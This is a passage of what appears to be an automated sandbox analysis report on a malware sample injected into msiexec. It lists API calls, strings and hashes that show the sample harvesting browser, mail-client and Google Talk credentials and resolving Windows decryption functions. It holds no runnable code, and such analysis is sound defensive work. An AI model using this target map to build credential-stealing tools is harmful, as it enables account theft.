                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                • String ID:
                                                                                • API String ID: 3143880245-0
                                                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 380 410e37-410e40 375->380 386 410e51-410e76 call 410d3d call 410add 376->386 387 410e7f-410e92 _mbscpy 376->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->376 382->371 384 410de9-410dec 382->384 384->371 384->379 388 410e95-410e97 385->388 386->387 387->388
                                                                                APIs
                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                • memset.MSVCRT ref: 00410E10
                                                                                • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 119022999-2036018995
                                                                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                APIs
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                • memset.MSVCRT ref: 00408620
                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                • memset.MSVCRT ref: 00408671
                                                                                Strings
                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                • API String ID: 3996936265-1079885057
                                                                                • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                APIs
                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$_strcmpimemset
                                                                                • String ID: /stext
                                                                                • API String ID: 520177685-3817206916
                                                                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                APIs
                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID:
                                                                                • API String ID: 145871493-0
                                                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                APIs
                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                • String ID:
                                                                                • API String ID: 4165544737-0
                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                • API String ID: 2238633743-192783356
                                                                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                • API String ID: 3963849919-1658304561
                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID: (yE$(yE$(yE
                                                                                • API String ID: 1865533344-362086290
                                                                                • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                APIs
                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                • memset.MSVCRT ref: 0040E736
                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                • memset.MSVCRT ref: 0040E858
                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                • API String ID: 4171719235-3943159138
                                                                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                • GetDC.USER32 ref: 004104E2
                                                                                • strlen.MSVCRT ref: 00410522
                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 1703216249-3046471546
                                                                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004024F5
                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                • _mbscpy.MSVCRT(?,00000000,?,?,?,67CE7B60,?,00000000), ref: 00402533
                                                                                • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                • API String ID: 168965057-606283353
                                                                                • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
